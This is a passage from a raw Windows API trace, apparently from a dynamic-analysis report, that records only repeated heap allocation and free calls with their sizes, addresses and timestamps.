lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0194.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.408] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.408] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.409] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.409] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.410] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.410] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.411] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.412] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.412] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.413] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.413] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.414] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.415] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.416] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.416] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.417] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.417] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.418] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.419] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.419] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.420] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.420] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.421] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.422] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.424] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.424] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.425] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0194.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.427] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.427] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0194.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0194.428] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.428] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0194.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.429] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.429] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.430] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0194.430] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0194.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0194.431] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f48 | out: hHeap=0x620000) returned 1 [0194.431] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.431] RtlAllocateHeap 